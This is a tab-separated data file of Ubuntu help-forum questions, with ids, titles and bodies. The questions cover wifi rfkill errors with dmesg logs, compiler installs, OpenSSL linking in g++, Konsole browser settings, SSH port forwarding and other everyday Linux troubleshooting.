62119	is programming on arm a good choice ?	i 'm looking for a portable , lightweight device to do some programming on . up to now the natural choice would have been a notebook but with tegra 3 tablets due in a few weeks the necessary performance is coming to something even more `` mobile '' . as a programmer i got hundreds of interesting pdfs , even the university gives out the courses as pdfs . to read a text , a tablet sure is more comfortable than a notebook . i 'm intrigued of the thought of relaxing on the sofa reading and being able to test the code at once . of course android - i 'm not talking of an ipad - is just a consumer platform and not intended to code on . yet i 've seen videos and tutorials how to set up ubuntu on an ex-android tablet such as the asus transformer or samsung galaxy tab 10.1 . however , no offence meant , i 've learned that everything with linux is due to become difficult . you have to configure and tweak for hours . therefore my questions : has anybody of you ever used linux on arm ? do you know about driver support for arm ? tegra 2/3 , ... did you ever use an arm linux for programming ? what about eclipse , netbeans , .. are the arm builds officially supported ? frankly : am i running into some serious problems or will it work fine ? i 'm not a linux master but would n't mind some initial problems . i just do n't want to get stuck with something really difficult .
62129	how to install open64 compiler ?	open64 is the compiler maintained by amd , here are the links : http : //developer.amd.com/tools/cpu-development/x86-open64-compiler-suite/ and the community maintained one http : //www.open64.net/home.html i would love to know how to install it . the instructions from this link : http : //www.open64.net/documentation/installing-open64-424/building-the-compiler.html did n't work nor the instructions from the howto-install-open64 file , which are the same ... it returns error 127 and then error 2 .
62140	after xubuntu 10.04 to 10.10 upgrade , my keyboard shortcuts no longer work	i upgraded my xubuntu 10.04 workstation to 10.10 and the upgrade went ok , apart from the fact that now my keyboard shortcuts do n't work . the precious one for me is `` run program '' which is usually bound to alt+f2 . ctrl+esc usually brings up the applications menu , that 's not working either . i 've checked all my settings in settings manager and everything looks normal . also done some googling but to no avail . anyone have any clues ?
62144	is there a way to add individual files to ubuntu one , not just directories ?	i have a lot of files in a lot of different places on my computer i would like to be able to access from ubuntu1 . i just do n't want to add all the directories . is there a way to add just one file from a directory to u1 without adding the whole directory -or could i persuade the code-wizards to make it possible ?
62146	selfcontrol-like filtering	is there a way to filter site categories for ubuntu 11.04 just like selfcontrol so that i wo n't be able to pass them i.e , gain access to them by turning something off ( for unlimited time ) ?
62148	can i legally use ubuntu server to create a commercial web application on amazon ec2 ?	based on wikipedia ubuntu is covered mainly under gnu gpl . in my company anything related to gpl means - ca n't be used , they are very afraid of legal traps related to gpl . that 's why i have this question : can ubuntu server on amazon ec2 be used as a host os for commercial web application ? if yes , is there any legal documents proving this ? i found about ubuntu licensing . is it enough to be sure my company is safe from any legal issues ?
62152	how to combine an ssd boot drive with a hdd data drive ?	i have a ssd with 64 gb and a 6 gb/s 1 terabyte harddrive . i want to use the ssd only as a boot device and maybe for swap storage . on the 1 terabyte harddrive i want ot have the main file system . as in windows i liked to have at least 2-3 partitions example for music games programs and so on . which partition layout do you recommend me ?
62158	spellcheck for pdf file	is there any utility or command on ubuntu for checking spelling errors in a pdf file ? or how can i integrate spellcheck in evince ( 1 ) ? please let me know .
62166	`` siocsifflags : operation not possible due to rf-kill '' ?	i am getting this error as a part of this problem here but since this problem is totally different issue i think it is better to consider this issue separately . my wlan0 is down . when i try to turn it on with $ sudo ifconfig wlan0 up siocsifflags : operation not possible due to rf-kill and then $ sudo rfkill list all 0 : phy0 : wireless lan soft blocked : yes hard blocked : no 1 : tpacpi_bluetooth_sw : bluetooth soft blocked : yes hard blocked : yes what does the error msg mean ? what is the rf-kill ? hardware specs $ sudo lshw -class network *-network description : ethernet interface product : 82573l gigabit ethernet controller vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 00 serial : 00:16 : d3:22:96 : c2 capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=1.2.20-k2 firmware=0.5-1 latency=0 link=no multicast=yes port=twisted pair resources : irq:44 memory : ee000000-ee01ffff ioport:2000 ( size=32 ) *-network disabled description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 02 serial : 00:13:02:46:63:74 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=2.6.38-11-generic firmware=15.32.2.9 latency=0 link=no multicast=yes wireless=ieee 802.11abg resources : irq:45 memory : edf00000-edf00fff os version and kernel version $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=11.04 distrib_codename=natty distrib_description= '' ubuntu 11.04 '' $ uname -r 2.6.38-11-generic [ update ] when i apply fossfreedom 's suggestion , i get `` siocsifflags : no such device '' . the kernel is for some reason rejecting the card , as pointed by ff . dmesg after disabling and enabling wli3945 , with blocked wifi # modprobe -r iwl3945 # modprobe iwl3945 # dmesg|tail -n 50 [ 6835.430537 ] pm : resume of devices complete after 1889.701 msecs [ 6835.430800 ] pm : resume devices took 1.888 seconds [ 6835.430845 ] pm : finishing wakeup . [ 6835.430847 ] restarting tasks ... done . [ 6835.502666 ] video lnxvideo:00 : restoring backlight state [ 6835.572203 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id [ 6835.852380 ] e1000e 0000:02:00.0 : irq 46 for msi/msi-x [ 6835.908162 ] e1000e 0000:02:00.0 : irq 46 for msi/msi-x [ 6835.908775 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 6836.919274 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , commit=600 [ 6837.769253 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , commit=600 [ 6859.097311 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , commit=0 [ 6882.076501 ] e1000e 0000:02:00.0 : irq 46 for msi/msi-x [ 6882.132190 ] e1000e 0000:02:00.0 : irq 46 for msi/msi-x [ 6882.132924 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 6883.722633 ] e1000e : eth0 nic link is up 100 mbps full duplex , flow control : rx/tx [ 6883.722645 ] e1000e 0000:02:00.0 : eth0 : 10/100 speed : disabling tso [ 6883.723071 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 6894.000044 ] eth0 : no ipv6 routers present [ 6896.551932 ] exe ( 2743 ) : /proc/2743/oom_adj is deprecated , please use /proc/2743/oom_score_adj instead . [ 8289.212078 ] usb 1-2 : new high speed usb device using ehci_hcd and address 4 [ 8289.280270 ] hub 1-0:1.0 : unable to enumerate usb device on port 2 [ 8289.608059 ] usb 1-2 : new high speed usb device using ehci_hcd and address 5 [ 8291.006963 ] usb 1-2 : usb disconnect , address 5 [ 8291.308072 ] usb 1-2 : new high speed usb device using ehci_hcd and address 6 [ 8291.591228 ] usb 1-2 : usb disconnect , address 6 [ 9598.556083 ] usb 1-2 : new high speed usb device using ehci_hcd and address 7 [ 9599.059441 ] usb 1-2 : usb disconnect , address 7 [ 11838.072332 ] iwl3945 0000:03:00.0 : master disable timed out , 100 usec [ 11838.072993 ] iwl3945 0000:03:00.0 : pci int a disabled [ 11850.210319 ] cfg80211 : calling crda to update world regulatory domain [ 11850.218431 ] cfg80211 : world regulatory domain updated : [ 11850.218436 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 11850.218440 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 11850.218444 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 11850.218448 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 11850.218452 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 11850.218456 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 11850.291510 ] iwl3945 : intel ( r ) pro/wireless 3945abg/bg network connection driver for linux , in-tree : s [ 11850.291515 ] iwl3945 : copyright ( c ) 2003-2010 intel corporation [ 11850.291601 ] iwl3945 0000:03:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 11850.291624 ] iwl3945 0000:03:00.0 : setting latency timer to 64 [ 11850.331841 ] iwl3945 0000:03:00.0 : tunable channels : 13 802.11bg , 23 802.11a channels [ 11850.331847 ] iwl3945 0000:03:00.0 : detected intel wireless wifi link 3945abg [ 11850.332023 ] iwl3945 0000:03:00.0 : irq 45 for msi/msi-x [ 11850.332274 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 11850.332436 ] ieee80211 phy0 : selected rate control algorithm 'iwl-3945-rs' [ 11850.361710 ] iwl3945 0000:03:00.0 : loaded firmware version 15.32.2.9 [ 11850.361885 ] iwl3945 0000:03:00.0 : radio disabled by hw rf kill switch [ 11850.365924 ] iwl3945 0000:03:00.0 : radio disabled by hw rf kill switch dmesg with unblocked wifi # rfkill list all 1 : tpacpi_bluetooth_sw : bluetooth soft blocked : no hard blocked : yes 2 : phy0 : wireless lan soft blocked : no hard blocked : no # dmesg|tail -n 50 [ 27.649606 ] fb0 : inteldrmfb frame buffer device [ 27.649608 ] drm : registered panic notifier [ 27.649815 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 27.662754 ] hda intel 0000:00:1b.0 : pci int b - > gsi 17 ( level , low ) - > irq 17 [ 27.662760 ] hda_intel : probe_mask set to 0x1 for device 17aa:2010 [ 27.662831 ] hda intel 0000:00:1b.0 : irq 46 for msi/msi-x [ 27.662868 ] hda intel 0000:00:1b.0 : setting latency timer to 64 [ 27.769460 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0x100-0x3af : excluding 0x170-0x177 0x1f0-0x1f7 0x2f8-0x2ff 0x370-0x377 [ 27.774801 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0x3e0-0x4ff : excluding 0x3f0-0x3f7 0x4d0-0x4d7 [ 27.775742 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0x820-0x8ff : clean . [ 27.788575 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0xc00-0xcf7 : clean . [ 27.789382 ] pcmcia_socket pcmcia_socket0 : cs : memory probe 0x0c0000-0x0fffff : excluding 0xc0000-0xd3fff 0xdc000-0xfffff [ 27.789466 ] pcmcia_socket pcmcia_socket0 : cs : memory probe 0xa0000000-0xa0ffffff : clean . [ 27.789547 ] pcmcia_socket pcmcia_socket0 : cs : memory probe 0x60000000-0x60ffffff : excluding 0x60000000-0x60ffffff [ 27.789632 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0xa00-0xaff : clean . [ 27.813146 ] e1000e 0000:02:00.0 : irq 44 for msi/msi-x [ 27.868221 ] e1000e 0000:02:00.0 : irq 44 for msi/msi-x [ 27.868866 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 27.876620 ] ibm trackpoint firmware : 0x0e , buttons : 3/3 [ 27.892982 ] input : tpps/2 ibm trackpoint as /devices/platform/i8042/serio1/input/input6 [ 28.121555 ] ppdev : user-space parallel port driver [ 29.426589 ] e1000e : eth0 nic link is up 100 mbps full duplex , flow control : rx/tx [ 29.426597 ] e1000e 0000:02:00.0 : eth0 : 10/100 speed : disabling tso [ 29.426893 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 31.009483 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , commit=0 [ 34.474875 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , commit=0 [ 40.160038 ] eth0 : no ipv6 routers present [ 7394.332227 ] exe ( 1666 ) : /proc/1666/oom_adj is deprecated , please use /proc/1666/oom_score_adj instead . [ 7587.420396 ] iwl3945 0000:03:00.0 : pci int a disabled [ 7599.728554 ] cfg80211 : calling crda to update world regulatory domain [ 7599.736628 ] cfg80211 : world regulatory domain updated : [ 7599.736632 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 7599.736637 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 7599.736641 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 7599.736645 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 7599.736649 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 7599.736653 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 7599.797314 ] iwl3945 : intel ( r ) pro/wireless 3945abg/bg network connection driver for linux , in-tree : s [ 7599.797319 ] iwl3945 : copyright ( c ) 2003-2011 intel corporation [ 7599.797397 ] iwl3945 0000:03:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 7599.797419 ] iwl3945 0000:03:00.0 : setting latency timer to 64 [ 7599.837714 ] iwl3945 0000:03:00.0 : tunable channels : 13 802.11bg , 23 802.11a channels [ 7599.837719 ] iwl3945 0000:03:00.0 : detected intel wireless wifi link 3945abg [ 7599.837880 ] iwl3945 0000:03:00.0 : irq 45 for msi/msi-x [ 7599.838124 ] registered led device : phy0-led [ 7599.838170 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 7599.838335 ] ieee80211 phy0 : selected rate control algorithm 'iwl-3945-rs' [ 7599.980440 ] iwl3945 0000:03:00.0 : loaded firmware version 15.32.2.9 [ 7599.980656 ] iwl3945 0000:03:00.0 : radio disabled by hw rf kill switch [ 7599.983562 ] iwl3945 0000:03:00.0 : radio disabled by hw rf kill switch dmesg and iwl3945 without blocked wifi # modprobe -r iwl3945 # modprobe iwl3945 # dmesg| tail -n 50 [ 29.426597 ] e1000e 0000:02:00.0 : eth0 : 10/100 speed : disabling tso [ 29.426893 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 31.009483 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , commit=0 [ 34.474875 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , commit=0 [ 40.160038 ] eth0 : no ipv6 routers present [ 7394.332227 ] exe ( 1666 ) : /proc/1666/oom_adj is deprecated , please use /proc/1666/oom_score_adj instead . [ 7587.420396 ] iwl3945 0000:03:00.0 : pci int a disabled [ 7599.728554 ] cfg80211 : calling crda to update world regulatory domain [ 7599.736628 ] cfg80211 : world regulatory domain updated : [ 7599.736632 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 7599.736637 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 7599.736641 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 7599.736645 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 7599.736649 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 7599.736653 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 7599.797314 ] iwl3945 : intel ( r ) pro/wireless 3945abg/bg network connection driver for linux , in-tree : s [ 7599.797319 ] iwl3945 : copyright ( c ) 2003-2011 intel corporation [ 7599.797397 ] iwl3945 0000:03:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 7599.797419 ] iwl3945 0000:03:00.0 : setting latency timer to 64 [ 7599.837714 ] iwl3945 0000:03:00.0 : tunable channels : 13 802.11bg , 23 802.11a channels [ 7599.837719 ] iwl3945 0000:03:00.0 : detected intel wireless wifi link 3945abg [ 7599.837880 ] iwl3945 0000:03:00.0 : irq 45 for msi/msi-x [ 7599.838124 ] registered led device : phy0-led [ 7599.838170 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 7599.838335 ] ieee80211 phy0 : selected rate control algorithm 'iwl-3945-rs' [ 7599.980440 ] iwl3945 0000:03:00.0 : loaded firmware version 15.32.2.9 [ 7599.980656 ] iwl3945 0000:03:00.0 : radio disabled by hw rf kill switch [ 7599.983562 ] iwl3945 0000:03:00.0 : radio disabled by hw rf kill switch [ 7906.428550 ] iwl3945 0000:03:00.0 : pci int a disabled [ 7913.242835 ] cfg80211 : calling crda to update world regulatory domain [ 7913.249969 ] cfg80211 : world regulatory domain updated : [ 7913.249973 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 7913.249978 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 7913.249982 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 7913.249986 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 7913.249990 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 7913.249994 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 7913.311805 ] iwl3945 : intel ( r ) pro/wireless 3945abg/bg network connection driver for linux , in-tree : s [ 7913.311810 ] iwl3945 : copyright ( c ) 2003-2011 intel corporation [ 7913.311885 ] iwl3945 0000:03:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 7913.311907 ] iwl3945 0000:03:00.0 : setting latency timer to 64 [ 7913.352172 ] iwl3945 0000:03:00.0 : tunable channels : 13 802.11bg , 23 802.11a channels [ 7913.352177 ] iwl3945 0000:03:00.0 : detected intel wireless wifi link 3945abg [ 7913.352330 ] iwl3945 0000:03:00.0 : irq 45 for msi/msi-x [ 7913.352601 ] registered led device : phy0-led [ 7913.352642 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 7913.352806 ] ieee80211 phy0 : selected rate control algorithm 'iwl-3945-rs' [ 7913.385208 ] iwl3945 0000:03:00.0 : loaded firmware version 15.32.2.9 [ 7913.385384 ] iwl3945 0000:03:00.0 : radio disabled by hw rf kill switch [ 7913.387138 ] iwl3945 0000:03:00.0 : radio disabled by hw rf kill switch
62168	can/how to burn a .flac to an audio cd	this is a two part question . can i burn .flac to audio cds ? this might seem silly , but i was an early adopter of mp3 players . think several years before ipods . i never really had the need to burn too many cds . my girlfriend , however , keeps asking for cds for her cars cd player . i do have a huge collection . most of which from artists who have a live recording policy . so sorry , no help on illegal downloads from me . so , can i give her great quality music , or will i need to convert these to mp3s ? if this is the latter , what format might one suggest ? google seems to indicate that it is indeed possible . how do i burn these files from the command line ? i am probably going to burn straight from my file-sever , which is headless machine ( 10.4 ) ? i do have some .cue files , but ironically they seem to point to .wav files , where the files in question are .flac files . am i able to utilize these .cue files ?
62171	not able to start juggernaut server as a background processs/service	i am using ruby on rails application to implement chat . i am not able to setup juggernaut server in production mode . i followed this guide to setup redis . and its working perfectly fine . then i followed this for setting up juggernaut . but when i am trying to start juggernaut its not working . here is the out for grep commands to check that redis is working but juggernaut is not . when i am trying to stop/start redis server its gives me output ie : starting/stopping redis-server : redis-server . but nothing when i m doing the same for juggernaut . check screenshot . some other things to check what actually going on : executable file permissions to /etc/init.d/juggernaut file -- yes -rwxr-xr-x 1 fizzy fizzy 1310 sep 19 11:06 juggernaut pidfile=/var/run/juggernaut.pid ' is defined . does that exist ? -- - no in the 'start ' part it runs 'chown juggernaut : juggernaut ' . does the user juggernaut exist and is it member of the group juggernaut ? -- yes/yes cat /etc/group redis : x:1002 : juggernaut : x:113 : groups juggernaut juggernaut : juggernaut running sudo juggernaut start the server , but i want to it to keep on running in background process/service . i am stuck now . can anybody help me . edit fizzy @ li136-198 : ~ $ sudo ls -l /usr/bin/juggernaut ls : can not access /usr/bin/juggernaut : no such file or directory fizzy @ li136-198 : ~ $ sudo ls -l /usr/local/bin/juggernaut lrwxrwxrwx 1 root root 40 sep 20 02:48 /usr/local/bin/juggernaut - > ../lib/node_modules/juggernaut/server.js i tried changing daemon=/usr/bin/juggernaut to daemon=/usr/local/bin/juggernaut after that i tried restarting the juggernaut using sudo /etc/init.d/juggernaut start server started but not as background process/service . edit running script in debuggin mode : + path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin + daemon=/usr/bin/juggernaut + name=juggernaut2 + desc=juggernaut2 + pidfile=/var/run/juggernaut.pid + test -x /usr/bin/juggernaut + exit 0 edit fizzy @ li136-198 : ~ $ sudo /etc/init.d/juggernaut start + path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin + daemon=/usr/local/bin/juggernaut + name=juggernaut2 + desc=juggernaut2 + pidfile=/var/run/juggernaut.pid + test -x /usr/local/bin/juggernaut + set -e + case `` $ 1 '' in + echo -n 'starting juggernaut2 : ' starting juggernaut2 : + touch /var/run/juggernaut.pid + chown juggernaut : juggernaut /var/run/juggernaut.pid + start-stop-daemon -- start -- quiet -- umask 007 -- pidfile /var/run/juggernaut.pid -- chuid juggernaut : juggernaut -- exec /usr/local/bin/juggernaut 20 sep 06:41:16 - your node instance does not have root privileges . this means that the flash xml policy file will be served inline instead of on port 843 . this will slow down initial connections slightly . 20 sep 06:41:16 - socket.io ready - accepting connections node.js:134 throw e ; // process.nexttick error , or 'error ' event on first tick ^ error : eaddrinuse , address already in use at server._dolisten ( net.js:1106:5 ) at net.js:1077:14 at object.lookup ( dns.js:153:45 ) at server.listen ( net.js:1071:20 ) at object.listen ( /usr/local/lib/node_modules/juggernaut/lib/juggernaut/server.js:51:21 ) at object.listen ( /usr/local/lib/node_modules/juggernaut/lib/juggernaut/index.js:9:10 ) at object. < anonymous > ( /usr/local/lib/node_modules/juggernaut/server.js:21:12 ) at module._compile ( module.js:402:26 ) at object..js ( module.js:408:10 ) at module.load ( module.js:334:31 ) + echo failed failed + exit 0 here is the out for all the used ports tcp 0 0 localhost.localdom:9312 * : * listen tcp 0 0 localhost.localdo : mysql * : * listen tcp 0 0 *:6379 * : * listen tcp 0 0 * : http-alt * : * listen tcp 0 0 * : www * : * listen tcp 0 0 localhost.localdo:52433 * : * listen tcp 0 0 * : ssh * : * listen tcp 0 0 localhost.localdo:53784 * : * listen tcp 0 0 * : smtp * : * listen tcp6 0 0 [ : : ] : ssh [ : : ] : * listen
62172	banshee works on my profile , but not my wifes	banshee works perfectly on my settings , but refused to play the same playlist on my wife 's banshee . yes i imported the playlist , just to let you know ... ; - ) .
62173	download c++ reference	i 'm learning c++ and are currently for some weeks without consistently working internet connection . i search a ( ascii ) terminal searchable & readable c++ documentation . today i e. g. searched for c_str ( ) reference and could n't find anything in ubuntu default man pages . i 'm thankful for any tips and hints
62177	how to switch from metacity to compiz permanently ?	i know that by typing a command : compiz -- replace into the terminal window you can switch back to compiz , but this only works till the next logout/reboot . i want to switch for good . in natty narwhal i ca n't see any options in preferences/appearance to do that . there must be a configuration file somewhere , i guess ? please , help ! i checked the value you give and it was already set to compiz . however , only after using 'replace ' command i get the required functionality like workspace edge .
62182	how do i change the default browser that konsole opens urls with ?	i have google-chrome set as my default web browser in ubuntu and gnome applications . however , when using konsole , all links open in konqueror , and not google-chrome ! i 've tried setting the default browser with : sudo update-alternatives -- config 'x-www-browser' this works for opening links in gnome-terminal , and other gnome programs ... but not kde ones like konsole . also , there appears to be no kcontrol program for accessing the kde settings . does anyone know a way to set the kde setting for this while still using gnome ? edit : from what i can tell , i 've got all the related settings configured that i can think of ... grep 'chrome ' ~/.local/share/applications/mimeapps.list x-scheme-handler/http=google-chrome.desktop ; firefox.desktop ; x-scheme-handler/https=google-chrome.desktop ; firefox.desktop ; x-scheme-handler/http=google-chrome.desktop x-scheme-handler/https=google-chrome.desktop x-scheme-handler/chrome=firefox.desktop text/html=google-chrome.desktop application/x-extension-htm=google-chrome.desktop ; firefox.desktop ; application/x-extension-html=google-chrome.desktop ; firefox.desktop ; application/x-extension-shtml=google-chrome.desktop ; firefox.desktop ; application/xhtml+xml=google-chrome.desktop ; firefox.desktop ; application/x-extension-xhtml=google-chrome.desktop ; firefox.desktop ; application/x-extension-xht=google-chrome.desktop ; firefox.desktop ; x-scheme-handler/about=google-chrome.desktop x-scheme-handler/unknown=google-chrome.desktop grep 'chrome ' /usr/share/applications/defaults.list text/html=firefox.desktop ; google-chrome.desktop text/xml=firefox.desktop ; google-chrome.desktop application/xhtml_xml=google-chrome.desktop x-scheme-handler/http=firefox.desktop ; google-chrome.desktop x-scheme-handler/https=firefox.desktop ; google-chrome.desktop x-scheme-handler/ftp=google-chrome.desktop and there are no references to konqueror : grep -i 'konqueror ' /usr/share/applications/defaults.list grep -i 'konqueror ' ~/.local/share/applications/mimeapps.list grep -i 'kon ' /usr/share/applications/defaults.list grep -i 'kon ' ~/.local/share/applications/mimeapps.list
62184	mail client that does not mark mails as read automatically ?	problem is , that mails get marked as read when i select them and they are shown in the preview pane . i tried thunderbird , claws mail and sylpheed and i did n't find an option that prevents this . i 'm open for new mail clients ( but no console or kde , please ) .
62188	my folders in the ubuntu one cloud are empty , my control panel says i am using 947 mb	i have not folders in the ubuntu one cloud , my control panel says i am using 947 mb . how can i fix this problem
62189	items in notification area not coming up after startup	my 3 year old played with my computer and now all items in the notification area are not coming up anymore , including nm-applet skype keyring i have checked various sources on the internet in regards to the problem , largely relating to nm-applet not being visible or keyring not starting . i was also able to restore .gconf/ and .gconfd from backup , but none of these helped . i have checked that nm-applet -- sm-disable /usr/bin/gnome-keyring-daemon -- start -- components=pkcs11 are in my startup programs . where else can i look ? is there a log that i could check ?
62202	i ca n't ssh in from outside my network , but i can from inside	my ssh server is set up on the standard port , and i forwarded the correct port in my router , but i 'm still getting a `` connection refused '' message when trying to connect from the outside . i can connect from the inside just fine .
62203	how to access executable in a seperate partition ?	i have just started using ubuntu and i have my hard drive set up with an ubuntu partition , a windows 7 partition and a much larger storage partition where i keep most of my files . i have been doing some programming and have been putting a.out into a folder in the storage partition . when i try to launch it in bash i got a permission denied error . i then did a sudo chmod +x a.out , but this did not give any feedback so i tried to launch a.out again and got permission denied . i tried using the gui to change a.out to executable but when i checked the box it unchecks right away . i did some googling and it seems that the partition itself needs to be given permission to execute . so i did sudo chmod +x storage and then i did ls -l and got : drwx -- -- -- 1 jared jared 4096 2011-09-17 21:03 storage when i go back to change a.out it still wont change . this is the line from /proc/mounts for the file system : /dev/sda3 /media/storage fuseblk rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , default_permissions , allow_other , blksize=4096 0 0 i 'm sure there is something about permissions i am misunderstanding so if some one could point me in the right direction it would be greatly appreciated . thanks , jared
62204	g++ behaving strangely with libssl	i 've been trying to use the rsa c library on a c++ application ( since it seems like the proper way to do it , due to the lack of an `` official '' [ read : openssl ] c++ implementation ) . the thing is , whenever i try to compile a testing code : # include < iostream > # include < openssl/rsa.h > # include < openssl/engine.h > # include < unistd.h > using namespace std ; int main ( int argc , char *argv [ ] ) { rsa *mykeypair = rsa_generate_key ( 2048 , 65537 , null , null ) ; unsigned char *to ; unsigned char *totwo ; if ( mykeypair == null ) { cout < < `` error 1 '' < < endl ; return 0 ; } to = ( unsigned char * ) malloc ( rsa_size ( mykeypair ) - 11 ) ; if ( rsa_private_encrypt ( 13 , ( const unsigned char * ) '' hello world ! `` , to , mykeypair , rsa_pkcs1_padding ) == -1 ) { cout < < `` error 2 '' < < endl ; return 0 ; } cout < < to < < endl ; totwo = ( unsigned char * ) malloc ( rsa_size ( mykeypair ) - 11 ) ; if ( rsa_public_decrypt ( 13 , to , totwo , mykeypair , rsa_pkcs1_padding ) == -1 ) { cout < < `` error 3 '' < < endl ; return 0 ; } cout < < totwo ; free ( to ) ; free ( totwo ) ; rsa_free ( mykeypair ) ; return 0 ; } i get undefined reference errors for all rsa_* functions ( please notice that i am linking with -lssl ) . to make it even weirder , compiling the very same code using gcc does the job ( well , of course , it wo n't compile because of the c++ std lib references , but the point is that i do n't get undefined reference for rsa functions ) . any ideas on how to go about this ? ( without recurring to any other lib ? ) .
62205	create wifi network that links to specific server page on boot	i 'm running ubuntu 11.04 headless with a wifi card . everything works fine , but i need the box create a wifi point on boot that redirects all connected users to a certain page on the server . let me know if you have any advice . thanks !
62206	use super_l ( winkey ) as a main menu toggle button in gnome ?	i know how to set super_l ( winkey ) button to open the menu . gconftool-2 -- set /apps/metacity/global_keybindings/panel_main_menu -- type string `` super_l '' currently , in order to close that menu , i am having to mouse click outside the menu area . i need to use the super_l as a toggle button . ( pressing one time would open and pressing second time would close ) so what i need now is to be able to close it when pressing it second time .
62208	sudoers permission without loging in as root	i am a new user to ubuntu 10.10 my problem is when i start my machine it takes me to login screen of ubuntu but i did n't get option for logging in as user or root i know my root password and all even cant make a ssh request i goggled it i got to know to press alt+ctrl+f1 it takes me to login of user in this user after logging i am unable to write sudo commands after searching for a while i came to know that permission to sudo might be crating a problem permission to a sudo must be 440 i think which is 777 now how to start up with my root access
62209	no wireless detected , no drivers available	i am running ubuntu 11.04 32bit on a lenovo e520 with a intel wifi link 1000 bgn device . though windows7 can connect itself to wifi as well as being able to see other wifi networks , ubuntu can not . when i went to additional driver , no drivers are on the list . how can i connect my laptop to wireless network and use drivers in ubuntu ?
